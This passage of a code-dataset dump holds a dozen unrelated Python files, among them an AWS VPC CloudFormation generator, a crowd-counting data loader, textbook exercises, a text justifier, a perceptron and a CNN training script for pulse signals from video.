##########################################################################################################\n\n template.add_resource(\n ec2.InternetGateway(\n title=\"LabVPCGateway\",\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.igw\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.VPCGatewayAttachment(\n title=\"LabVPCGatewayAttachment\",\n InternetGatewayId=Ref('LabVPCGateway'),\n VpcId=Ref('LabVPC')\n )\n )\n\n # --- NAT Gateways\n\n template.add_resource(\n ec2.EIP(\n title=\"EipNatGatewayPublicSubnetA\",\n Domain='vpc'\n )\n )\n\n template.add_resource(\n ec2.EIP(\n title=\"EipNatGatewayPublicSubnetB\",\n Domain='vpc'\n )\n )\n\n template.add_resource(\n ec2.NatGateway(\n title=\"NatGatewayPublicSubnetA\",\n AllocationId=GetAtt('EipNatGatewayPublicSubnetA', 'AllocationId'),\n SubnetId=Ref('PublicSubnetA'),\n )\n )\n\n template.add_resource(\n ec2.NatGateway(\n title=\"NatGatewayPublicSubnetB\",\n AllocationId=GetAtt('EipNatGatewayPublicSubnetB', 'AllocationId'),\n SubnetId=Ref('PublicSubnetB'),\n )\n )\n\n ##########################################################################################################\n # Network Routing\n ##########################################################################################################\n\n # -- public 
route\n\n template.add_resource(\n ec2.RouteTable(\n title=\"PublicRouteTable\",\n VpcId=Ref('LabVPC'),\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.rtable.pub\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.Route(\n title=\"PublicDefaultRoute\",\n RouteTableId=Ref('PublicRouteTable'),\n GatewayId=Ref('LabVPCGateway'),\n DestinationCidrBlock=('0.0.0.0/0'),\n )\n )\n\n template.add_resource(\n ec2.SubnetRouteTableAssociation(\n title=\"PublicRouteTableAssociationSubnetA\",\n RouteTableId=Ref('PublicRouteTable'),\n SubnetId=Ref('PublicSubnetA'),\n )\n )\n\n template.add_resource(\n ec2.SubnetRouteTableAssociation(\n title=\"PublicRouteTableAssociationSubnetB\",\n RouteTableId=Ref('PublicRouteTable'),\n SubnetId=Ref('PublicSubnetB'),\n )\n )\n\n # Private route - private subnet a\n\n template.add_resource(\n ec2.RouteTable(\n title=\"PrivateRouteTableSubnetA\",\n VpcId=Ref('LabVPC'),\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.rtable.prv.a\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.Route(\n title=\"DefaultRoutePrivateSubnetA\",\n RouteTableId=Ref('PrivateRouteTableSubnetA'),\n NatGatewayId=Ref('NatGatewayPublicSubnetA'),\n DestinationCidrBlock=('0.0.0.0/0'),\n )\n )\n\n template.add_resource(\n ec2.SubnetRouteTableAssociation(\n title=\"PrivateRouteTableAssociationSubnetA\",\n RouteTableId=Ref('PrivateRouteTableSubnetA'),\n SubnetId=Ref('PrivateSubnetA'),\n )\n )\n\n # Private route - private subnet b\n\n template.add_resource(\n ec2.RouteTable(\n title=\"PrivateRouteTableSubnetB\",\n VpcId=Ref('LabVPC'),\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.rtable.prv.b\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.Route(\n title=\"DefaultRoutePrivateSubnetB\",\n RouteTableId=Ref('PrivateRouteTableSubnetB'),\n NatGatewayId=Ref('NatGatewayPublicSubnetB'),\n DestinationCidrBlock=('0.0.0.0/0'),\n )\n )\n\n template.add_resource(\n ec2.SubnetRouteTableAssociation(\n title=\"PublicDefaultRouteSubnetB\",\n RouteTableId=Ref('PrivateRouteTableSubnetB'),\n SubnetId=Ref('PrivateSubnetB'),\n )\n )\n\n ##########################################################################################################\n # Outputs\n ##########################################################################################################\n\n template.add_output(\n [\n Output(\n \"NatGatewayA\",\n Description=\"Public IP For NAT Gateway A\",\n Value=Ref('EipNatGatewayPublicSubnetA')\n ),\n Output(\n \"NatGatewayB\",\n Description=\"Public IP For NAT Gateway B\",\n Value=Ref('EipNatGatewayPublicSubnetB')\n )\n ]\n )\n\n print(template.to_json())\n\nif __name__ == '__main__':\n generate_template()\n","sub_path":"lab03/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":13368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"48939305","text":"import numpy as np\n\nfrom semseg.datasets.seg_label import SegLabel\n\n\nclass RemapLabel:\n def __init__(self, label, unknown_id=0):\n self.label_map = label\n self.unkown_id = unknown_id\n\n def __call__(self, lbl):\n # remap_lbl = lbl[np.where(np.isin(lbl, cls.label_map.support_id_list), lbl, 0)]\n color_lbl = 
np.full_like(lbl, self.unkown_id)\n for label in self.label_map:\n label: SegLabel\n color_lbl[lbl == label.orig_ID] = label.to_ID\n return color_lbl\n","sub_path":"semseg/datasets/transforms/remap_label.py","file_name":"remap_label.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"535257375","text":"\"\"\"Data Structures and Algorithms in Python - Goodrich, M. et al., page 53\"\"\"\n\n# C-1.23 Give an example of a Python code fragment that attempts to write an element\n# to a list based on an index that may be out of bounds. If that index\n# is out of bounds, the program should catch the exception that results, and\n# print the following error message:\n# “Don’t try buffer overflow attacks in Python!”\n\ndef list_out_of_bounds(a_list, element, index):\n \"\"\"Attempts to write element at index position within the list.\"\"\"\n try:\n a_list[index] = element\n except:\n raise Exception('Don’t try buffer overflow attacks in Python!')\n\n# C-1.24 Write a short Python function that counts the number of vowels in a given\n# character string.\n\ndef count_vowels(string):\n \"\"\"Counts the number of vowels in a string.\"\"\"\n # vowels = ['A', 'a', 'E', 'e', 'I', 'i', 'O', 'o', 'U', 'u', 'Y', 'y']\n vowels = 'aeiouy'\n counter = 0\n for character in string:\n if character.lower() in vowels:\n counter += 1\n return counter\n\n# C-1.25 Write a short Python function that takes a string s, representing a sentence,\n# and returns a copy of the string with all punctuation removed. For example,\n# if given the string \"Let s try, Mike.\", this function would return\n# \"Lets try Mike\".\n\ndef remove_punctuation(sentence):\n \"\"\"Removes all punctuation from a sentence string.\"\"\"\n result = ''\n punctuation = [\"'\", '\"', ':', ';', '.', ',', '!', '?', '-']\n for letter in sentence:\n if letter not in punctuation:\n result += letter\n return result\n\n# C-1.27 In Section 1.8, we provided three different implementations of a generator\n# that computes factors of a given integer. The third of those implementations,\n# from page 41, was the most efficient, but we noted that it did not\n# yield the factors in increasing order. 
Modify the generator so that it reports\n# factors in increasing order, while maintaining its general performance advantages.\n\ndef factors(num):\n \"\"\"Generator that computes factors.\"\"\"\n# k = 1\n# while k * k < num: # while k < sqrt(n)\n# if num % k == 0:\n# yield k\n# yield num // k\n# k += 1\n# if k * k == num:\n# yield k\n for k in range(1, num + 1):\n if num % k == 0:\n yield k\n","sub_path":"Learning Python/2017.10.24-TILs/creativity.py","file_name":"creativity.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"521186824","text":"from __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport sys\nimport glob\nimport scipy.interpolate\n\n\n#Define paths\nPhoton_files = glob.glob('/unsafe/tok2/LocalOutputs/RT/General/vacuum/*.txt') #t, r, theta, phi\nMPD_full = glob.glob('/unsafe/tok2/LocalOutputs/MPD/MPD_whole*.txt') #t,x,y,z\nMPD_section = glob.glob('/unsafe/tok2/LocalOutputs/MPD/MPD_SAVEsection*.txt') #t,x,y,z\n\n#Get sys input parameters\nRT_ID = sys.argv[1]\nMPD_ID = sys.argv[2]\nINTERP_ID = sys.argv[3]\n\n#Set up plotting axes\nfig = plt.figure(figsize=(10,10))\n#ax = fig.add_subplot(111, projection = '3d')\nax = fig.add_subplot(111)\nax.scatter(0,0,c='k')\n\n#ax.scatter(0,0,0,c='r')\n#ax.scatter(0,0,c='k')\ncounter = 0\n#Define plotting functions\ndef plotPHOTON(file):\n\n data=np.loadtxt(file)\n \n print (file)\n \n t = data[:,0]\n r = data[:,1]\n theta = data[:,2]\n phi = data[:,3]\n \n a = 0.998\n m = (r**2 +a**2)**0.5\n\n x =m*np.sin(theta)*np.cos(phi)\n y=m*np.sin(theta)*np.sin(phi)\n z=r*np.cos(theta)\n ax.plot(x,y) \n \n #ax.plot(x,y,z)\n #ax.scatter(x[0],y[0],z[0],c='g')\n\ndef plotMPD(file,counter):\n print ('MPD ', file)\n \n \n data = np.loadtxt(file)\n r = data[:,1]\n theta = data[:,2]\n phi = data[:,3]\n \n a = 0.998\n m = (r**2 +a**2)**0.5\n\n x =m*np.sin(theta)*np.cos(phi)\n y=m*np.sin(theta)*np.sin(phi)\n z=r*np.cos(theta)\n \n if counter == 1:\n ax.scatter(x,y,z)\n print (x[0],y[0],z[0])\n else:\n ax.plot(x,y,z)\n # ax.scatter(x,y,z)\n # ax.scatter(x[0],y[0],z[0], c='g')\n # ax.scatter(x[-1],y[-1],z[-1], c='r')\n \n\n\n\n\n '''\n ax.plot(x,y)\n if counter == 1:\n ax.scatter(x,y)\n else:\n ax.scatter(x,y,c='k')\n\n ax.scatter(x[0],y[0], c='g')\n ax.scatter(x[-1],y[-1], c='r') '''\n # with open('targets.txt','w') as f:\n # for ii in np.arange(len(x)):\n # f.write('time ./a.out '+str(x[ii]) +' '+ str(y[ii]) + ' ' + str(z[ii])+ ' ' +str(counter) + '\\n')\n\n\n#Now do some plotting\nif RT_ID == 'y':\n print ('Ray Tracing plotted')\n for file in Photon_files:\n plotPHOTON(file)\nelse:\n print ('No Ray Tracing plotted')\n\nif MPD_ID == 'y':\n print ('MPD plotted')\n \n for file in MPD_section:\n plotMPD(file,1)\nelse:\n print ('No MPD plotted')\n\n\n\n\n\n#plotMPD(MPD_full[0],0)\n\n\n'''\ndatafile = '/home/tok2/core/RayTracing/saver.txt'\ndata = np.loadtxt(datafile)\nx = data[0]\ny = data[1]\nz = data[2]\nxx = data[3]\nyy = data[4]\nds = data[5]\nax.scatter(x,y,z, c='k')\n'''\n\n\n\n\n\n\n\n#Format trajectory Axes\nlimit = 15\nax.set_xlim(-limit,limit)\nax.set_ylim(-limit,limit)\n#ax.set_zlim(-limit,limit) \nax.set_xlabel('x [M]') \nax.set_ylabel('y [M]') \n#ax.set_zlabel('z [M]') \n\nplt.show()\n","sub_path":"Tools/Plot.py","file_name":"Plot.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} 
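The ray-tracing plot record ending here (Plot.py) repeats one coordinate transform in both plotPHOTON and plotMPD: spherical (r, theta, phi) samples are projected onto Cartesian axes with a fixed spin parameter a = 0.998. Factored into a standalone helper, the shared mapping looks like the sketch below; the function name is illustrative, and only the arithmetic is taken from the record itself.

import numpy as np

def to_cartesian(r, theta, phi, a=0.998):
    # Projection used by plotPHOTON/plotMPD in the record above:
    # the horizontal radius is sqrt(r^2 + a^2), while the height
    # deliberately uses r alone, matching the original script.
    m = np.sqrt(r ** 2 + a ** 2)
    x = m * np.sin(theta) * np.cos(phi)
    y = m * np.sin(theta) * np.sin(phi)
    z = r * np.cos(theta)
    return x, y, z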
+{"seq_id":"318037151","text":"# BT3051 Assignment 1b\r\n#Roll Number: BE14B002\r\n#Collaborators: BE14B020\r\n#Time: 1:30\r\nimport sys\r\nimport doctest\r\ndef read_fasta(fname):\r\n \"\"\" (str) -> (list of tuples)\r\n # function body with documentation\r\n \"\"\"\r\n seq=[]\r\n sequence_name=[]\r\n sequence=[]\r\n with open(fname) as file:\r\n lines=file.read()\r\n lines=lines.split(\">\")\r\n lines = list(filter(None, lines))\r\n for iseq in lines:\r\n seq.append(iseq.split(\"\\n\"))\r\n for ilist in seq:\r\n sequence_name.append(ilist[0])\r\n sequence.append(\"\".join(ilist[1:len(ilist)]))\r\n sequences=list(zip(sequence_name,sequence))\r\n return sequences # a list of (sequence_name, sequence) tuples\r\n\r\ndef compute_protein_mass(protein_str):\r\n \"\"\"\r\n (str)->(float)\r\n #function body including documentation and test cases\r\n >>> compute_protein_mass('SKADYEK')\r\n 839.407\r\n \"\"\"\r\n with open(\"PROT_MASS.txt\") as file:\r\n weights={'X':0}\r\n mass=0\r\n for lines in file:\r\n lines=lines.split()\r\n weights[lines[0]]=float(lines[1])\r\n for ilet in protein_str:\r\n mass+=weights[ilet]\r\n mass+=18.01528\r\n mass=float(\"%.3f\" %mass)\r\n return mass\r\n\r\nif __name__ == '__main__':\r\n #DO NOT CHANGE THE FOLLOWING STATEMENTS\r\n for seq_name, seq in read_fasta(\"hw1a_dataset.faa\"):\r\n print (seq_name, compute_protein_mass(seq))\r\n\r\nif __name__ == '__main__':\r\n doctest.testmod(verbose = True)\r\n","sub_path":"hw/hw1/hw1a.py","file_name":"hw1a.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"322202574","text":"from datetime import datetime\n\nfrom gamecounter.utils.database import RootDocument, max_length, min_items\n\n\nclass Match(RootDocument):\n __collection__ = \"gamecounter_matches\"\n __database__ = \"gamecounter\"\n\n structure = {\n \"datetime\": datetime,\n \"location\": str,\n \"game\": str,\n \"players\": list,\n \"winner\": str,\n }\n required_fields = [\"datetime\", \"game\", \"players\"]\n validators = {\n \"location\": max_length(100),\n \"game\": max_length(100),\n \"players\": min_items(1),\n \"winner\": max_length(64)\n }\n use_dot_notation = True\n\n def __repr__(self):\n return \"\".format(self.username)\n","sub_path":"gamecounter/matches/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"32006168","text":"from torch.utils.data import Dataset\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport cv2\nfrom torchvision import transforms\nimport random\nfrom PIL import Image\nimport glob\n\n\nclass CrowdDataset(Dataset):\n '''\n crowdDataset\n '''\n def __init__(self, img_root, gt_dot_root, split_txt_filepath=None, phase='train', aug=0, normalize=True, fixed_size=-1, max_side=-1):\n '''\n img_root: the root path of images.\n gt_dot_root: the root path of ground-truth dot map.\n phase: train or test\n split_txt_filepath: text file containing list of images to include in the dataset. 
If none, then use all jpg images in img_root\n '''\n self.img_root=img_root\n self.gt_dot_root=gt_dot_root\n self.phase=phase\n self.split_txt_filepath = split_txt_filepath\n\n if(split_txt_filepath is None):\n self.img_names=[filename for filename in os.listdir(img_root) \\\n if os.path.isfile(os.path.join(img_root,filename))]\n else:\n img_list = np.loadtxt(split_txt_filepath, dtype=str) \n self.img_names=[filename + '.jpg' for filename in img_list[:,0] \\\n if os.path.isfile(os.path.join(img_root,filename+ '.jpg'))]\n\n self.n_samples=len(self.img_names)\n\n self.aug=aug\n self.normalize = normalize;\n self.fixed_size = fixed_size\n self.max_side = max_side\n\n print('self.aug', self.aug)\n print('self.fixed_size', self.fixed_size)\n\n def __len__(self):\n return self.n_samples\n\n def __getitem__(self,index):\n assert index <= len(self), 'index range error'\n img_name=self.img_names[index]\n img=plt.imread(os.path.join(self.img_root,img_name))/255# convert from [0,255] to [0,1]\n \n if len(img.shape)==2: # expand grayscale image to three channel.\n img=img[:,:,np.newaxis]\n img=np.concatenate((img,img,img),2)\n img=img[:,:,0:3]\n\n gtdot_path = os.path.join(self.gt_dot_root,img_name.replace('.jpg','_gt_dots.npy'));\n if(os.path.isfile(gtdot_path)):\n gt_dot=np.load(gtdot_path)\n else:\n gtdot_path = os.path.join(self.gt_dot_root,img_name.replace('.jpg','.npy'));\n if(os.path.isfile(gtdot_path)):\n gt_dot=np.load(gtdot_path)\n else:\n gt_dot=np.zeros((img.shape[0], img.shape[1]))\n\n \n if random.randint(0,1)==1 and self.phase=='train':\n img=img[:,::-1].copy() # horizontal flip\n gt_dot=gt_dot[:,::-1].copy() # horizontal flip\n \n if(self.phase=='train' and self.max_side > 0):\n h = img.shape[0]\n w = img.shape[1]\n h2 = h\n w2 = w\n crop = False\n if(h > self.max_side):\n h2 = self.max_side\n crop = True\n if(w > self.max_side):\n w2 = self.max_side\n crop = True\n if(crop):\n y=0\n x=0\n if(not (h2 ==h)):\n y = np.random.randint(0, high = h-h2)\n if(not (w2 ==w)):\n x = np.random.randint(0, high = w-w2)\n img = img[y:y+h2, x:x+w2, :]\r\n gt_dot = gt_dot[y:y+h2, x:x+w2]\r\n\n \n if ((self.aug > 0 and self.phase=='train')or (self.fixed_size > 0)):\n i = -1\n img_pil = Image.fromarray(img.astype(np.uint8)*255);\n if(self.fixed_size < 0):\n i, j, h, w = transforms.RandomCrop.get_params(img_pil, output_size=(img.shape[0]//4, img.shape[1]//4))\r\n elif(self.fixed_size < img.shape[0] or self.fixed_size < img.shape[1]):\r\n i, j, h, w = transforms.RandomCrop.get_params(img_pil, output_size=(min(self.fixed_size,img.shape[0]), min(self.fixed_size,img.shape[1])))\r\n #print('i, j, h, w',i, j, h, w)\r\n if(i >= 0):\r\n img = img[i:i+h, j:j+w, :]\r\n gt_dot = gt_dot[i:i+h, j:j+w]\r\n\n\n max_scale = 16\n if max_scale>1: # fix image and gt to match model.\n #ds_rows=int(img.shape[0]//max_scale)*max_scale\n #ds_cols=int(img.shape[1]//max_scale)*max_scale\n #img = img[:ds_rows, :ds_cols, :]\n #gt_dmap = gt_dmap[:ds_rows, :ds_cols]\n #gt_dot = gt_dot[:ds_rows, :ds_cols]\n ds_rows=int(img.shape[0]//max_scale)*max_scale\n ds_cols=int(img.shape[1]//max_scale)*max_scale\n pad_y1 = 0\n pad_y2 = 0\n pad_x1 = 0\n pad_x2 = 0\n if(ds_rows < img.shape[0]):\n pad_y1 = (max_scale - (img.shape[0] - ds_rows))//2\n pad_y2 = (max_scale - (img.shape[0] - ds_rows)) - pad_y1\n if(ds_cols < img.shape[1]):\n pad_x1 = (max_scale - (img.shape[1] - ds_cols))//2\n pad_x2 = (max_scale - (img.shape[1] - ds_cols)) - pad_x1\n img = np.pad(img, ((pad_y1,pad_y2),(pad_x1,pad_x2),(0,0)), 'constant', constant_values=(1,) )# padding 
constant differs by dataset based on bg color\n gt_dot = np.pad(gt_dot, ((pad_y1,pad_y2),(pad_x1,pad_x2)), 'constant', constant_values=(0,) )# padding constant differs by dataset based on bg color\n\n gt_dot=gt_dot[np.newaxis,:,:]\n gt_dot_tensor=torch.tensor(gt_dot,dtype=torch.float)\n\n img=img.transpose((2,0,1)) # convert to order (channel,rows,cols)\n img_tensor=torch.tensor(img,dtype=torch.float)\n if(self.normalize):\n img_tensor=transforms.functional.normalize(img_tensor,mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n return img_tensor,gt_dot_tensor,img_name\n\n\n","sub_path":"my_dataset_test.py","file_name":"my_dataset_test.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"523304807","text":"#! /usr/bin/python\nimport sys\nimport pdb\n\n# Change the text in file_name such that every line is of length\n# justify_length\ndef justify(file_name, justify_length):\n\tfile = open(file_name,'r+')\n\tnewFileText = \"\"\n\tfor line in file:\n\t\tnewFileText += justifyHelper(line,file,justify_length)\n\tfile.seek(0,0)\n\tfile.write(newFileText)\n\tfile.close()\n\ndef justifyHelper(line, file, justify_length):\n\t# If the line is greater than the justify_length, split off the line\n\t# at the justify length and justify the rest of the line on another line.\n\tif (len(line) > justify_length):\n\t\treturn justifyHelper2(line[0:justify_length - 2] + \"\\n\", file, justify_length) + justifyHelper(line[justify_length - 2:len(line)], file, justify_length)\n\telse:\n\t\treturn justifyHelper2(line, file, justify_length)\n\ndef justifyHelper2(line, file, justify_length):\n\tnumWords = len(line.split())\n\tspacesPerWord = (justify_length - len(line))/(numWords)\n\tnewLine = \"\"\n\twordFound = False\n\twordsFound = 0\n\tspacesAdded = 0\n\tfor letter in line:\n\t\tnewLine += letter\n\t\tif (letter == \"\\n\"):\n\t\t\tbreak\n\t\tif (wordFound == False):\n\t\t\tif (letter != ' '):\n\t\t\t\twordFound = True\n\t\t\t\twordsFound += 1\n\t\tif (wordFound):\n\t\t\tif (letter == ' '):\n\t\t\t\tif (wordsFound == numWords - 1):\n\t\t\t\t\tfor i in range(justify_length - len(line) - spacesAdded):\n\t\t\t\t\t\tnewLine += ' '\n\t\t\t\telse:\n\t\t\t\t\tfor i in range(spacesPerWord):\n\t\t\t\t\t\tnewLine += ' '\n\t\t\t\t\t\tspacesAdded += 1\n\t\t\t\twordFound = False\n\t#pdb.set_trace()\n\t#print \"old: \" + line\n\t#print len(newLine)\n\t#print \"new: \" + newLine\n\t#file.write(newLine)\n\treturn newLine\n\n# Program justifies text contents of a given file\n# This is the actual code that gets run when the\n# program is run. \n#\n# DO NOT EDIT BELOW HERE.\nif __name__ == \"__main__\":\n\n file_name = ''\n length = -1\n\n # Parse command line arguments\n try:\n for i in range(len(sys.argv)):\n if sys.argv[i] == '-f':\n file_name = sys.argv[i+1]\n elif sys.argv[i] == '-l':\n length = int(sys.argv[i+1])\n except:\n exit('Input error. Example input: justifytext -f mytextfile -l 80')\n\n if file_name == '' or length < 1:\n exit('Input error. 
Example input: justifytext -f mytextfile -l 80')\n \n justify(file_name, length)\n\t\n","sub_path":"justifytext.py","file_name":"justifytext.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"194465819","text":"import math\r\n\r\nn = int(input(\"Type in number of trails \\n >\"))\r\nr = int(input(\"Type in number of successes \\n >\"))\r\np = float(input(\"Type in the probability of success \\n >\"))\r\nNR = n - r\r\nq = 1 - p\r\n\r\nn_factorial = 1\r\nr_factorial = 1\r\nNR_factorial = 1\r\n\r\nif n < 0:\r\n print(\"Sorry, factorial does not exist for negative numbers\")\r\nelif n == 0:\r\n n_factorial = 1\r\nelse:\r\n for i in range(1,n + 1):\r\n n_factorial = n_factorial*i\r\n\r\n\r\nif r < 0:\r\n print(\"Sorry, factorial does not exist for negative numbers\")\r\nelif r == 0:\r\n r_factorial = 1\r\nelse:\r\n for i in range(1,r + 1):\r\n r_factorial = r_factorial*i\r\n\r\n\r\nif NR < 0:\r\n print(\"Sorry, factorial does not exist for negative numbers\")\r\nelif NR == 0:\r\n NR_factorial = 1\r\nelse:\r\n for i in range(1,NR + 1):\r\n NR_factorial = NR_factorial*i\r\n \r\n \r\nans = (n_factorial)/(r_factorial*NR_factorial) * (p**r) * (q**NR)\r\n \r\nprint(ans)\r\n \r\n","sub_path":"binomial_distribution.py","file_name":"binomial_distribution.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"646101430","text":"__author__ = 'Lev Osipov'\n\nimport numpy as np\nimport pandas as pd\nimport pylab as pl\n\n\ndef f(wghts, vec):\n result = np.dot(wghts, vec)\n if result > 0:\n return 1\n elif result < 0:\n return -1\n else:\n return 0\n\n\ndef iteration(wghts, lrn_rt, tr_classes, tr_data):\n for j in range(0, 10):\n i = np.random.randint(tr_data.shape[0])\n wghts += lrn_rt * (tr_classes[i] - f(wghts, tr_data.iloc[i])) * tr_data.iloc[i]\n\n\ndef test(wghts, data, classes):\n result = 0\n for i in range(0, data.shape[0]):\n if f(wghts, data.iloc[i]) == classes[i]:\n result += 1\n\n return result / float(len(data))\n\n\ntrain_data = pd.read_csv('train.csv')\ntest_data = pd.read_csv('test.csv')\n\ntrain_classes = train_data['class']\ntrain_data = train_data.drop('class', axis=1)\n\ntest_classes = test_data['class']\ntest_data = test_data.drop('class', axis=1)\n\nlearning_rate = 1\nmax_iterations = 100\n\nweights = np.zeros(train_data.shape[1])\nresults = []\nlocal_max = 0\nlocal_max_index = -1\nfor i in range(0, max_iterations):\n if local_max_index + 50 <= i:\n break\n iteration(weights, learning_rate, train_classes, train_data)\n learning_rate *= 0.95\n success_rate = test(weights, test_data, test_classes)\n if local_max < success_rate:\n local_max = success_rate\n local_max_index = i\n results.append([int(i + 1), success_rate])\nresults = np.array(results)\npl.plot(results[:, 0], results[:, 1])\npl.show()\n\n","sub_path":"4 Perceptron/Lab4_Osipov.py","file_name":"Lab4_Osipov.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"139253401","text":"# %%\nimport cv2\nimport h5py\nimport numpy as np\nfrom keras.models import Model, Sequential\nfrom keras.optimizers import Adam\nfrom keras.losses import SparseCategoricalCrossentropy, MeanAbsoluteError, Huber\nfrom keras import layers\nfrom tqdm import tqdm\nfrom datetime import datetime\nimport tensorflow as tf\n\n# %%\nsample_per_second = 2\n\n# Frame per 
second\nfps = 20\n# Blood volume signal reading per second\nrds = 256\n# Path to pickled data file\npath_to_hdf5 = \"data/data_in/data.hdf5\"\npath_to_video = \"data/data_in/data.avi\"\n\nsignal_sampling_rate = rds // sample_per_second\nframe_sampling_rate = fps // sample_per_second\n\nvideo_capture = cv2.VideoCapture(path_to_video)\nn_frames = int(video_capture.get(cv2.CAP_PROP_FRAME_COUNT))\n\nresolution = (int(video_capture.get(3)),\n int(video_capture.get(4)))\n\nhdf5_file = h5py.File(path_to_hdf5, 'r')\nbvp_raw = np.array(hdf5_file['pulse'])\n\nsampled_frames_buffer = []\n\nfor frame_number in tqdm(range(n_frames)):\n ret, frame = video_capture.read()\n if frame_number % frame_sampling_rate == 0:\n sampled_frames_buffer.append(frame)\n\nvideo_capture.release()\ncv2.destroyAllWindows()\n\nprint(f\"Sampled {len(sampled_frames_buffer)} frames out of {n_frames}.\")\n\nsampled_frames_buffer = np.array(sampled_frames_buffer, dtype=np.float32)\nbvp_raw_sampled = bvp_raw[::signal_sampling_rate]\n\nx_train = sampled_frames_buffer\ny_train = bvp_raw_sampled\n\n# %%\nlogdir = \"logs/train_data/\" + datetime.now().strftime(\"%Y%m%d-%H%M%S\")\nfile_writer = tf.summary.create_file_writer(logdir)\n\n# %%\n\n# model = applications.resnet50.ResNet50(input_shape=x_train.shape[1:])\n# x = model.output\n# x = Dropout(0.7)(x)\n# prediction = Dense(1)(x)\n\n# x_train shape -> (121, 480, 640, 3)\n\nmodel = Sequential()\n\nmodel.add(layers.Conv2D(64, kernel_size=(15, 10), strides=1, input_shape=x_train.shape[1:]))\nmodel.add(layers.MaxPooling2D(pool_size=(15, 10), strides=(2, 2)))\nmodel.add(layers.ELU())\nmodel.add(layers.BatchNormalization())\n\nmodel.add(layers.Conv2D(64, kernel_size=(15, 10), strides=1))\nmodel.add(layers.MaxPooling2D(pool_size=(15, 10), strides=(1, 1)))\nmodel.add(layers.ELU())\nmodel.add(layers.BatchNormalization())\n\nmodel.add(layers.Conv2D(64, kernel_size=(15, 10), strides=1))\nmodel.add(layers.MaxPooling2D(pool_size=(15, 10), strides=(1, 1)))\nmodel.add(layers.ELU())\nmodel.add(layers.BatchNormalization())\n\nmodel.add(layers.Conv2D(64, kernel_size=(12, 10), strides=1))\nmodel.add(layers.MaxPooling2D(pool_size=(15, 10), strides=(1, 1)))\nmodel.add(layers.ELU())\nmodel.add(layers.BatchNormalization())\n\nmodel.add(layers.Flatten())\n# model.add(layers.Conv2D(1, kernel_size=(1, 1), strides=1))\nmodel.add(layers.Dense(1, activation=\"linear\"))\n\nadam = Adam(lr=0.0001)\nmodel.compile(optimizer=adam, loss=Huber(), metrics=['mae'])\nhistory = model.fit(x_train, y_train, epochs=100, batch_size=1)\nmodel.save(f\"model_{datetime.now().strftime('%Y%m%d-%H%M%S')}\")\nhf = h5py.File('history_data.h5', 'w')\nhf.create_dataset('history', data=history)\nhf.close()\n\n","sub_path":"2d_convolution.py","file_name":"2d_convolution.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"498317785","text":"# def string (n):\n# revers_string = n[::-1]\n# return revers_string\n#\n# print (string(\"Cat is my\"))\n\ndef prime_number (n):\n if (n == 1):\n return False\n elif (n == 2):\n return True\n else:\n for x in range(2,n):\n if (n % x == 0):\n return False\n return True\n\nprint(prime_number(1))\n","sub_path":"pages/STRING_REVERS.py","file_name":"STRING_REVERS.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"102252482","text":"\"\"\"\n 3. 
